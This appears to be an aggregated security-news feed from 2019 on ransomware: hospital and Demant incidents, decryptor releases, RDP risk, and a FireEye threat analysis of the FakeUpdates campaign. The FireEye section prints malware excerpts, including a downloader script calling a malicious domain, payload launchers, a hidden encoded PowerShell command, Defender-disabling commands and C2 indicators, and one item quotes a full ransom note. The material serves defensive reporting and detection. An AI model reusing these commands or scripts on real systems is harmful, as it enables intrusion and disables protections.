“All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system.”

According to a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, had limited access to their computing systems.

“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”

Similar problems impacted at least seven hospitals in Australia. The information technology systems at a number of hospitals and health services in Gippsland and south-west Victoria have been impacted by a cyber security incident.

“A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.” reads the security advisory,

“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management. Hospitals have isolated and disconnected a number of systems such as internet to quarantine the infection.”

A couple of weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files. The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)


The post Ten hospitals in Alabama and Australia have been hit with ransomware attacks appeared first on Security Affairs.

Danish company Demant expects to suffer huge losses due to cyber attack

Danish hearing health care company Demant has estimated it will lose between $80 and $95 million due to a recent “cyber-crime” attack. Though the company has yet to share details about the “IT infrastructure incident”, it is widely believed to be the work of ransomware-wielding attackers. What is known? The attack started on September 2 and, apparently, the company quickly decided to shut down IT systems across multiple sites and business units: Still, the reaction … More

The post Danish company Demant expects to suffer huge losses due to cyber attack appeared first on Help Net Security.

Danish company Demant expects to incur losses of up to $95 after cyber attack

Demant, a leading international hearing health care company, expects to incur losses of up to $95 million following a ransomware attack.

Last month, Demant suffered a cyber attack that caused important problems to its operations, the company has yet to recover after the attack, a circumstance that suggests it was hit by a ransomware attack.

Demant expects to incur losses of up to $95 million following the incident, which includes a deduction of $14.6 million of expected insurance coverage.

We are therefore talking about figures that come into the list of the most important losses caused by cyber attacks.

“The cyber-crime has had a significant impact on our ability to generate the growth we expected for the second half-year, and even though our commercial operations are doing their utmost to make up for the impact of the incident, we are in a situation where we cannot execute on our ambitious commercial growth activities to the planned extent. We are working around the clock to return to our growth-oriented business focus, while minimising the impact on customers and users of our products. We are grateful for the patience and loyalty shown, and the Demant organisation will continue to approach the incident with extreme dedication until we are completely recovered and have re-established what was severely disrupted by the incident,” says Søren Nielsen, President & CEO of Demant.

On September 3, Demant was forced to shut down its entire internal IT infrastructure following an act of “cyber-crime,” but the firm did not confirm a ransom incident.

“As previously communicated in Company announcements on 3, 4 and 17 September, the Demant Group experienced a critical incident on our internal IT infrastructure on 3 September 2019. The Group’s IT infrastructure was hit by cyber-crime.” reads a message sent by the company to the investors.

“Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution.”

The company published a statement that confirmed that a large portion of its infrastructure was impacted.

“It remains unclear whether it was a hacker attack that caused a critical crash in the IT infrastructure of the Danish company Demant on Tuesday evening.” reported ComputerWord.

“But there are many indications that it could be a ransomware attack that has hit the company, according to security expert Jens Monrad, who is a daily employee of IT security firm FireEye.”

The company reported “delays in the supply of products as well as an impact on our ability to receive orders.” The incident impacted production lines in Poland as well as production in Mexico.

Many clinics across Demant network have not been able to regularly provide to their service to end-users.

The impact is predominately related to the estimated lost sales and on the growth momentum.

“Approximately half of the estimated lost sales relates to our hearing aid wholesale business. The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” concludes Demant.

“A little less than half of the estimated lost sales relates to our retail business where a significant number of clinics have been unable to service end-users in a regular fashion. We estimate that our retail business will see the biggest impact in Australia, the US and Canada followed by the UK. The vast majority of our clinics are now fully operational, however, due to the effect of the incident on our ability to generate new appointments during September, we expect some lost sales in the next one or two months, which is also included in the current estimate.”

The incident is important because demonstrates the potential impact of a cyber attack on organizations and urges them to adopt necessary countermeasures.

The massive NotPetya ransomware attack caused billions of dollars to organizations worldwide, the shipping giant Maersk and courier service FedEx incurred in over $300 million each. In April, the Aluminum producer Norsk Hydro estimated the cost of the massive attack cyber attack targeting the company in March at around $50 million.

Pierluigi Paganini

(SecurityAffairs – Demant, ransomware)

The post Danish company Demant expects to incur losses of up to $95 after cyber attack appeared first on Security Affairs.

Danish Firm Says Costs of Apparent Ransomware Attack Could Reach $95M

A Danish company revealed that the costs associated with what appears to be a ransomware attack could reach as much as $95 million. Demant, a Danish manufacturer of hearing aids, suffered a “critical incident” that affected its IT infrastructure on 3 September. The company’s IT team responded by shutting down multiple systems across multiple locations […]… Read More

The post Danish Firm Says Costs of Apparent Ransomware Attack Could Reach $95M appeared first on The State of Security.

Head Fake: Tackling Disruptive Ransomware Attacks

Within the past several months, FireEye has observed financially-motivated threat actors employ tactics that focus on disrupting business processes by deploying ransomware in mass throughout a victim’s environment. Understanding that normal business processes are critical to organizational success, these ransomware campaigns have been accompanied with multi-million dollar ransom amounts. In this post, we’ll provide a technical examination of one recent campaign that stems back to a technique that we initially reported on in April 2018.

Between May and September 2019, FireEye responded to multiple incidents involving a financially-motivated threat actor who leveraged compromised web infrastructure to establish an initial foothold in victim environments. This activity bared consistencies with a fake browser update campaign first identified in April 2018 – now tracked by FireEye as FakeUpdates. In this newer campaign, the threat actors leveraged victim systems to deploy malware such as Dridex or NetSupport, and multiple post-exploitation frameworks. The threat actors’ ultimate goal in some cases was to ransom systems in mass with BitPaymer or DoppelPaymer ransomware (see Figure 1).


Figure 1: Recent FakeUpdates infection chain

Due to campaign proliferation, we have responded to this activity at both Managed Defense customers and incident response investigations performed by Mandiant. Through Managed Defense network and host monitoring as well as Mandiant’s incident response findings, we observed the routes the threat actor took, the extent of the breaches, and exposure of their various toolkits.

Knock, Knock: FakeUpdates are Back!

In April 2018, FireEye identified a campaign that used compromised websites to deliver heavily obfuscated Trojan droppers masquerading as Chrome, Internet Explorer, Opera, and/or Firefox browser updates. The compromised sites contained code injected directly into the HTML or in JavaScript components rendered by the pages which had been injected. These sites were accessed by victim users either via HTTP redirects or watering-hole techniques utilized by the attackers.

Since our April 2018 blog post, this campaign has been refined to include new techniques and the use of post-exploitation toolkits. Recent investigations have shown threat actor activity that included internal reconnaissance, credential harvesting, privilege escalation, lateral movement, and ransomware deployment in enterprise networks. FireEye has identified that a large number of the compromised sites serving up the first stage of FakeUpdates have been older, vulnerable Content Management System (CMS) applications.

You Are Using an Older Version…of our Malware

The FakeUpdates campaign begins with a rather intricate sequence of browser validation, performed before the final payload is downloaded. Injected code on the initial compromised page will make the user’s browser transparently navigate to a malicious website using hard-coded parameters. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update. FireEye has observed that the browser validation sequence may have additional protections to evade sandbox detections and post-incident triage attempts on the compromise site(s).


Figure 2: Example of FakeUpdate landing page after HTTP redirects

The redirect process used numerous subdomains, with a limited number of IP addresses. The malicious subdomains are often changed in different parts of the initial redirects and browser validation stages.

After clicking the ‘Update’ button, we observed the downloading of one of three types of files:

  • Heavily-obfuscated HTML applications (.hta file extensions)
  • JavaScript files (.js file extensions)
  • ZIP-compressed JavaScript files (.zip extensions)

Figure 3 provides a snippet of JavaScript that provides the initial download functionality.

var domain = '//gnf6.ruscacademy[.]in/';
var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
var statTypeParamName = 'st';

var filename = 'download.hta';
var browser = 'Chrome';
var special = '1';   
var filePlain = window.atob(file64);
var a = document.getElementById('buttonDownload');

Figure 3: Excerpts of JavaScript code identified from the FakeUpdates landing pages

When the user opens the initial FakeUpdates downloader, the Windows Scripting Host (wscript.exe) is executed and the following actions are performed:

  1. A script is executed in memory and used to fingerprint the affected system.
  2. A subsequent backdoor or banking trojan is downloaded if the system is successfully fingerprinted.
  3. A script is executed in memory which:
    • Downloads and launches a third party screenshot utility.
    • Sends the captured screenshots to an attacker.
  4. The payload delivered in step 2 is subsequently executed by the script process.

The backdoor and banking-trojan payloads described above have been identified as Dridex, NetSupport Manager RAT, AZOrult, and Chthonic malware. The strategy behind the selective payload delivery is unclear; however, the most prevalent malware delivered during this phase of the infection chain were variants of the Dridex backdoor.

FakeUpdates: More like FakeHTTP

After the end user executes the FakeUpdates download, the victim system will send a custom HTTP POST request to a hard-coded Command and Control (C2) server. The POST request, depicted in Figure 4, showed that the threat actors used a custom HTTP request for initial callback. The Age HTTP header, for example, was set to a string of 16 seemingly-random lowercase hexadecimal characters.


Figure 4: Initial HTTP communication after successful execution of the FakeUpdates dropper

The HTTP Age header typically represents the time in seconds since an object has been cached by a proxy. In this case, via analysis of the obfuscated code on disk, FireEye identified that the Age header correlates to a scripted “auth header” parameter; likely used by the C2 server to validate the request. The first HTTP POST request also contains an XOR-encoded HTTP payload variable “a=”.

The C2 server responds to the initial HTTP request with encoded JavaScript. When the code is decoded and subsequently executed, system and user information is collected using wscript.exe. The information collected from the victim system included:

  • The malicious script that initialized the callback
  • System hostname
  • Current user account
  • Active Directory domain
  • Hardware details, such as manufacturer
  • Anti-virus software details
  • Running processes

This activity is nearly identical to the steps observed in our April 2018 post, indicating only minor changes in data collection during this stage. For example, in the earlier iteration of this campaign, we did not observe the collection of the script responsible for the C2 communication. Following the system information gathering, the data is subsequently XOR-encoded and sent via another custom HTTP POST request request to the same C2 server, with the data included in the parameter “b=”. Figure 5 provides a snippet of sample of the second HTTP request.


Figure 5: Second HTTP POST request after successful system information gathering

Figure 6 provides a copy of the decoded content, showing the various data points the malware transmitted back to the C2 server.

0=500
1=C:\Users\User\AppData\Local\Temp\Chrome.js
2=AMD64
3=SYSTEM1
4=User
5=4
6=Windows_NT
7=DOMAIN
8=HP
9=HP EliteDesk
10=BIOS_VERSION
11=Windows Defender|Vendor Anti-Virus
12=Vendor Anti-Virus|Windows Defender|
13=00:00:00:00:00:00
14=Enhanced (101- or 102-key)
15=USB Input Device
16=1024x768
17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe| winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|
svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe…

Figure 6: Decoded system information gathered by the FakeUpdates malware

After receiving the system information, the C2 server responds with an encoded payload delivered via chunked transfer-encoding to the infected system. This technique evades conventional IDS/IPS appliances, allowing for the second-stage payload to successfully download. During our investigations and FireEye Intelligence’s monitoring, we recovered encoded payloads that delivered one of the following:

  • Dridex (Figure 7)
  • NetSupport Manage Remote Access Tools (RATs) (Figure 8)
  • Chthonic or AZORult (Figure 9)
    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            wsh.Run('cmd /C rename "' + _tempFilePathSave + '" "' + execFileName + '"');
            WScript.Sleep(3 * 1000);
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 7: Code excerpt observed in FakeUpdates used to launch Dridex payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '" /verysilent');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 8: Code excerpt observed in FakeUpdates used to launch NetSupport payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 9: Code excerpt observed in FakeUpdates used to launch Chthonic and AZORult payloads

During this process, the victim system downloads and executes nircmdc.exe, a utility specifically used during the infection process to save two system screenshots. Figure 10 provides an example command used to capture the desktop screenshots.

"C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"

Figure 10: Sample command used to executed the Nircmd tool to take desktop screenshots

The PNG screenshots of the infected systems are then transferred to the C2 server, after which they are deleted from the system. Figure 11 provides an example of a HTTP POST request, again with the custom Age and User-Agent headers.


Figure 11: Screenshots of the infected system are sent to an attacker-controlled C2

Interestingly, the screenshot file transfers were neither encoded nor obfuscated, as with other data elements transferred by the FakeUpdates malware. As soon as the screenshots are transferred, nircmdc.exe is deleted.

All Hands on Deck

In certain investigations, the incident was far from over. Following the distribution of Dridex v4 binaries (botnet IDs 199 and 501), new tools and frameworks began to appear. FireEye identified the threat actors leveraged their Dridex backdoor(s) to execute the publicly-available PowerShell Empire and/or Koadic post-exploitation frameworks. Managed Defense also identified the FakeUpdates to Dridex infection chain resulting in the download and execution of PoshC2, another publicly available tool. While it could be coincidental, it is worth noting that the use of PoshC2 was first observed in early September 2019 following the announcement that Empire would no longer be maintained and could represent a shift in attacker TTPs. These additional tools were often executed between 30 minutes and 2 hours after initial Dridex download. The pace of the initial phases of related attacks possibly suggests that automated post-compromise techniques are used in part before interactive operator activity occurs.

We identified extensive usage of Empire and C2 communication to various servers during these investigations. For example, via process tracking, we identified a Dridex-injected explorer.exe executing malicious PowerShell: a clear sign of an Empire stager:


Figure 12: An example of PowerShell Empire stager execution revealed during forensic analysis

In the above example, the threat actors instructed the victim system to use the remote server 185.122.59[.]78 for command-and-control using an out-of-the-box Empire agent C2 configuration for TLS-encrypted backdoor communications.

During their hands-on post-exploitation activity, the threat actors also moved laterally via PowerShell remoting and RDP sessions. FireEye identified the use of WMI to create remote PowerShell processes, subsequently used to execute Empire stagers on domain-joined systems. In one specific case, the time delta between initial Empire backdoor and successful lateral movement was under 15 minutes. Another primary goal for the threat actor was internal reconnaissance of both the local system and domain the computer was joined to. Figure 13 provides a snippet of Active Directory reconnaissance commands issued by the attacker during one of our investigations.


Figure 13: Attacker executed commands

The threat actors used an Empire module named SessionGopher and the venerable Mimikatz to harvest endpoint session and credential information. Finally, we also identified the attackers utilized Empire’s Invoke-EventVwrBypass, a Windows bypass technique used to launch executables using eventvwr.exe, as shown in Figure 14.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x


Figure 14: PowerShell event viewer bypass

Ransomware Attacks & Operator Tactics

Within these investigations, FireEye identified the deployment BitPaymer or DoppelPaymer ransomware. While these ransomware variants are highly similar, DoppelPaymer uses additional obfuscation techniques. It also has enhanced capabilities, including an updated network discovery mechanism and the requirement of specific command-line execution. DoppelPaymer also uses a different encryption and padding scheme.

The ransomware and additional reconnaissance tools were downloaded through public sharing website repositories such as DropMeFiles and SendSpace. Irrespective of the ransomware deployed, the attacker used the SysInternals utlity PSEXEC to distribute and execute the ransomware.  

Notably, in the DoppelPaymer incident, FireEye identified that Dridex v2 with the Botnet ID 12333 was downloaded onto the same system previously impacted by an instance of Dridex v4 with Botnet ID 501. Within days, this secondary Dridex instance was then used to enable the distribution of DoppelPaymer ransomware.  Prior to DoppelPaymer, the threat actor deleted volume shadow copies and disabled anti-virus and anti-malware protections on select systems. Event log artifacts revealed commands executed through PowerShell which were used to achieve this step (Figure 15):

Event Log

EID

Message

Microsoft-Windows-PowerShell%4Operational

600

 HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true

Microsoft-Windows-PowerShell%4Operational

600

 HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender

Application

1034

Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82.

Figure 15: Event log entries related to the uninstallation of AV agents and disablement of real-time monitoring

The DoppelPaymer ransomware was found in an Alternate Data Stream (ADS) in randomly named files on disk. ADSs are attributes within NTFS that allow for a file to have multiple data streams, with only the primary being visible in tools such as Windows Explorer. After ransomware execution, files are indicated as encrypted by being renamed with a “.locked” file extension. In addition to each “.locked” file, there is a ransom note with the file name “readme2unlock.txt” which provides instructions on how to decrypt files.


Figure 16: DoppelPaymer ransomware note observed observed during a Mandiant Incident Response investigation

Ransomware? Not In My House!

Over the past few years, we have seen ransomware graduate from a nuisance malware to one being used to extort victim networks out of significant sums of money. Furthermore, threat actors are now coupling ransomware with multiple toolkits or other malware families to gain stronger footholds into an environment. In this blog post alone, we witnessed a threat actor move through multiple toolsets - some automated, some manual - with the ultimate goal of holding the victim organization hostage.

Ransomware also raises the stakes for unprepared organizations as it levels the playing field for all areas of your enterprise. Ransomware proves that threat actors don’t need to get access to the most sensitive parts of your organization – they need to get access to the ones that will disrupt business processes. This widens your attack surface, but luckily, also gives you more opportunity for detection and response. Mandiant recently published an in depth white paper on Ransomware Protection and Containment Strategies, which may help organizations mitigate the risk of ransomware events.

Indicators

The following indicator set is a collective representation of artifacts identified during investigations into multiple customer compromises.

Type

Indicator(s)

FakeUpdates Files

0e470395b2de61f6d975c92dea899b4f

7503da20d1f83ec2ef2382ac13e238a8

102ae3b46ddcb3d1d947d4f56c9bf88c

aaca5e8e163503ff5fadb764433f8abb

2c444002be9847e38ec0da861f3a702b

62eaef72d9492a8c8d6112f250c7c4f2

175dcf0bd1674478fb7d82887a373174
10eefc485a42fac3b928f960a98dc451
a2ac7b9c0a049ceecc1f17022f16fdc6

FakeUpdates Domains & IP Addresses

<8-Characters>.green.mattingsolutions[.]co
<8-Characters>.www2.haciendarealhoa[.]com
<8-Characters>.user3.altcoinfan[.]com
93.95.100[.]178
130.0.233[.]178
185.243.115[.]84

gnf6.ruscacademy[.]in

backup.awarfaregaming[.]com

click.clickanalytics208[.]com

track.amishbrand[.]com

track.positiverefreshment[.]org

link.easycounter210[.]com

nircmdc.exe

8136d84d47cb62b4a4fe1f48eb64166e

Dridex

7239da273d3a3bfd8d169119670bb745

72fe19810a9089cd1ec3ac5ddda22d3f
07b0ce2dd0370392eedb0fc161c99dc7
c8bb08283e55aed151417a9ad1bc7ad9

6e05e84c7a993880409d7a0324c10e74

63d4834f453ffd63336f0851a9d4c632

0ef5c94779cd7861b5e872cd5e922311

Empire C2

185.122.59[.]78

109.94.110[.]136

Detecting the Techniques

FireEye detects this activity across our platforms, including named detections for Dridex, Empire, BitPaymer and DoppelPaymer Ransomware. As a result of these investigations, FireEye additionally deployed new indicators and signatures to Endpoint and Network Security appliances.  This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform

Signature Name

 

Endpoint Security

 

HX Exploit Detection
Empire RAT (BACKDOOR)
EVENTVWR PARENT PROCESS (METHODOLOGY)
Dridex (BACKDOOR)
Dridex A (BACKDOOR)
POWERSHELL SSL VERIFICATION DISABLE (METHODOLOGY)
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
FAKEUPDATES SCREENSHOT CAPTURE (METHODOLOGY)

Network Security

Backdoor.FAKEUPDATES
Trojan.Downloader.FakeUpdate
Exploit.Kit.FakeUpdate
Trojan.SSLCert.SocGholish

MITRE ATT&CK Technique Mapping

ATT&CK

Techniques

Initial Access

Drive-by Compromise (T1189), Exploit Public-Facing Application (T1190)

Execution

PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)

Persistence

DLL Search Order Hijacking (T1038)

Privilege Escalation

Bypass User Account Control (T1088), DLL Search Order Hijacking (T1038)

Defense Evasion

Bypass User Account Control (T1088), Disabling Security Tools (T1089), DLL Search Order Hijacking (T1038), File Deletion (T1107), Masquerading (T1036), NTFS File Attributes (T1096), Obfuscated Files or Information (T1027), Scripting (T1064), Virtualization/Sandbox Evasion (T1497)

Credential Access

Credential Dumping (T1003)

Discovery

Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Share Discovery (T1135), Process Discovery (T1057), Remote System Discovery (T1018), Security Software Discovery (T1063), System Information Discovery (T1082), System Network Configuration Discovery (T1016), Virtualization/Sandbox Evasion (T1497)

Lateral Movement

Remote Desktop Protocol (T1076),  Remote File Copy (T1105)

Collection

Data from Local System (T1005), Screen Capture (T1113)

Command And Control

Commonly Used Port (T1436), Custom Command and Control Protocol (T1094) ,Data Encoding (T1132), Data Obfuscation (T1001), Remote Access Tools (T1219), Remote File Copy (T1105), Standard Application Layer Protocol (T1071)

Exfiltration

Automated Exfiltration (T1020), Exfiltration Over Command and Control Channel (T1041)

Impact

Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), Service Stop (T1489)

Acknowledgements

A huge thanks to James Wyke and Jeremy Kennelly for their analysis of this activity and support of this post.

Emsisoft released a new free decryption tool for the Avest ransomware

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days after the release of WannaCryFake decryptor.

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days ago the researchers also released a free decryptor for the WannaCryFake ransomware.

The Avest ransomware encrypts victim’s files and appends the extension “.ckey().email().pack14” to the filename.

Below the text of the ransom note “!!!Readme!!!Help!!!.txt” that the ransomware drops on the infected systems:

"Problems with your data? Contact us: data1992@protonmail[.]com key: <victim specific>”

The decryption tool could be used by the victims only after they have successfully removed the malware from their system to avoid that the Avest ransomware will repeatedly lock the machine or will encrypt files.

“The decryptor requires access to a file pair consisting of one encrypted file and the original, unencrypted version of the encrypted file to reconstruct the encryption keys needed to decrypt the rest of your data.” reads the user guide published by Emsisoft. “Please do not change the file names of the original and encrypted files, as the decryptor may perform file name comparisons to determine the correct file extension used for encrypted files on your system.”

Victims of the Avest ransomware can download the decryptor tool here:

https://www.emsisoft.com/ransomware-decryption-tools/avest

In August, security researchers at Emsisoft released a decryptor tool that allows the victims of the JSWorm 4.0 ransomware to decrypt their files for free. In May Emsisoft experts released a free Decrypter tool for the JSWorm 2.0 variant.

In July the company released other free decryptors for the LooCipher ransomware, the ZeroFucks ransomware, and the Ims00rry ransomware.

Pierluigi Paganini

(SecurityAffairs – Avest ransomware, hacking)

The post Emsisoft released a new free decryption tool for the Avest ransomware appeared first on Security Affairs.

Critical Infrastructure Technology (ICIT) highlights ransomware and RDP access as the current focus

The Institute for Critical Infrastructure Technology (ICIT) points out, in a paper warning of the evolution of what it calls’ disruptionware’ ransomware and the access to RDP as the current focus of a new development which “sees adversaries interrupting business continuity,” posing “an existential threat to key infrastructure operators.”

The move from random to targeted attacks is underlined. It is based on the industry’s double reluctance to close the RDP and the remarkable degree of access the attacker offers. In the first case, for instance, ICIT notes (PDF) that “805,665 systems remain vulnerable to the BlueKeep RDP operation, with estimated 105,170 systems based in the US, notwithstanding months of warning as of July 2, 2019.”

RDP, for example, provides full and remote control over the accessed device. “While the victim determines whether or not to pay for the ransom,” says ICIT, “the opponent retains system access, enabling them to install backdoors, remote Trojans or other malware that can make future attacks easier or provide service to other attackers.”

The reluctance of the industry to shut RDP down is due to their value as a remote maintenance business tool. “Manual maintenance is deemed too expensive compared to remote access solutions, especially if the systems are located overseas,” says the ICIT.

In a separate study (PDF), the Vectra security firm points out that RDP allows a centralized maintenance team to simultaneously monitor and fix systems at various factories. “The cost savings on this are substantial,” it says, indicating that every trip a technician undertakes for a machine fix on site is estimated to cost more than $2,000.

It also notes that the access provided by RDP is so great that a ransomware attack is not the first motive but the last effect. Vectra analyzed the problem of RDP from the context of her telemetry, “Having gained access to the infrastructure, reconnoitered the network, moved laterally through it, and exfiltrated all they want,” Vectra security analysis head Chris Morales told, “ransomware could be the final act to get as much money as possible.

For six months, its Cognito threat detection and response platform detected 26800 malicious RDP behavior against customers between January and June 2019. These are classified as pre-access (the system detects multiple attempts to attack brute force against RDP) or post-access (where machine learning detects suspicious behavior— such as attempts to use unexpected keyboard language for example).

By standardizing these figures, Vectra found that manufacture (20%), finance (16%) and retail (14%) represented the top three industries in the most affected, followed by the government (12%), healthcare (10%) and services (8%). Interesting is the incidence of attacks against the service industry. Morales said the Texas ransomware attacks came through their MSP. “With many MSPs using RDP to access their clients, this is a worrying threat vector,” he said.

Not all RDP attacks are necessarily linked to potential ransomware attacks— a crime or a nation State seeking PII or industrial espionage access might be involved. However, the high incidence of RDP samples against production is correlated to the ransomware increase against production in 2019.

ICIT notes that LockerGoga ransomware is alone responsible for attacks on “Altran, the Norwegian aluminum manufacturer Norsk Hydro, the American chemical companies Hexion and Momentive.” Its principal concern is that increasing industrial digitalisation means that IT and OT cannot be treated as separate entities anymore and that IT attacks via RDP are not possible.

The problem is that RDP is deemed too valuable to cease. Microsoft would be able to update the software to require a strong password, but this could cause problems for existing customers using already weaker passwords. “It has introduced 2FA,” Morales told, “but it’s not default to install it.” The user therefore has a responsibility to secure RDP and defend it from RDP attacks.

ICIT suggests that RDP (port 3389) needs to be evaluated and that, if necessary, links to specific trusted hosts should be whitelisted, all other blocked. Any system requiring an open RDP port,’ says Vectra,’ should go behind the firewall and require VPN users. You should also conduct regular inspection to ensure that the RDP port is not open to the public Internet.’

But Vectra points out that standard defenses don’t work properly against zero-day exploits. “In August 2019,” he notes, “Microsoft has announced four new critical vulnerabilities for RDPs, which all are’ pre authentication,’ which means that they may be executed without properly credential or victim input. It is striping that these exploits have worked for Windows 7, 8, and 10. Since Windows 10 is currently the latest and most popular operating system in Windows, this indicates that RDP attacks persist even as organizations update their IT systems.”

Vectra’s view was that RDP is such a dangerous threat vehicle that users should not rely on defenses to be overcome, but rather on the behavior of the modern threat detection system.

 

The post Critical Infrastructure Technology (ICIT) highlights ransomware and RDP access as the current focus appeared first on .

Emsisoft releases a free decryptor for the WannaCryFake ransomware

Researchers at Emsisoft security firm have released a new free decryption tool for the WannaCryFake ransomware.

Good news for the vicitms of the WannaCryFake ransomware, researchers at Emsisoft have released a FREE decryption tool that will allow decrypting their data.

WannaCryFake is a piece of ransomware that uses AES-256 to encrypt a victim’s files. The ransomware appends the following file extension to encrypted file:

“.[<id>][recoverydata54@protonmail.com].WannaCry”

“According to the ransomware distributors, the price of decryption depends on how quickly you email them, but under no circumstances should you attempt to make contact.” states the port published by Emsisoft.

The ransom note dropped by the WannaCryFake ransomware states:

All your files have been encrypted!

All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail recoverydata54@protonmail.com

also You can use telegram ID:@data54

You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files.

Free decryption as guarantee

Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)

How to obtain Bitcoins

The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click ‘Buy bitcoins’, and select the seller by payment method and price.

Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/

Jabber client installation instructions:

Download the jabber (Pidgin) client from https://pidgin.im/download/windows/

After installation, the Pidgin client will prompt you to create a new account.

Click “Add”

In the “Protocol” field, select XMPP

In “Username” – come up with any name

In the field “domain” – enter any jabber-server, there are a lot of them, for example – exploit.im

Create a password

At the bottom, put a tick “Create account”

Click add

If you selected “domain” – exploit.im, then a new window should appear in which you will need to re-enter your data:

Userpassword

You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below)

If you don’t understand our Pidgin client installation instructions, you can find many installation tutorials on youtube – https://www.youtube.com/results?search_query=pidgin+jabber+install

Attention!

Do not rename encrypted files.

Do not try to decrypt your data using third party software, it may cause permanent data loss.

Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Victims of the malware can download the WannaCryFake Decryptor here.

“Regardless of what the ransom note might say, our decryption tool can help you recover your files for free and will not cause permanent data loss. Please get in touch with our support team if you have any questions.” concludes Emsisoft.

In August, security researchers at Emsisoft released a decryptor tool that allows the victims of the JSWorm 4.0 ransomware to decrypt their files for free. In May Emsisoft experts released a free Decrypter tool for the JSWorm 2.0 variant.

In July the company released other free decryptors for the LooCipher ransomware, the ZeroFucks ransomware, and the Ims00rry ransomware.

Pierluigi Paganini

(SecurityAffairs – ransomware, hacking)

The post Emsisoft releases a free decryptor for the WannaCryFake ransomware appeared first on Security Affairs.

Free Decryptors Released for Two Ransomware Families

Security researchers have released decryption tools which victims of two different ransomware families can use to recover their files for free. On 25 September, Kaspersky Lab unveiled decryptors for both the Yatron and FortuneCrypt crypto-ransomware families. In its analysis of the first threat, the Russian security firm found that Yatron derived much of its code […]… Read More

The post Free Decryptors Released for Two Ransomware Families appeared first on The State of Security.

Older vulnerabilities and those with lower severity scores still being exploited by ransomware

Almost 65% of top vulnerabilities used in enterprise ransomware attacks targeted high-value assets like servers, close to 55% had CVSS v2 scores lower than 8, nearly 35% were old (from 2015 or earlier), and the vulnerabilities used in WannaCry are still being used today, according to RiskSense. The data was gathered from a variety of sources including RiskSense proprietary data, publicly available threat databases, as well as findings from RiskSense threat researchers and penetration testers. … More

The post Older vulnerabilities and those with lower severity scores still being exploited by ransomware appeared first on Help Net Security.

WanaCry Ransomware still a threat two years on – HackingVision

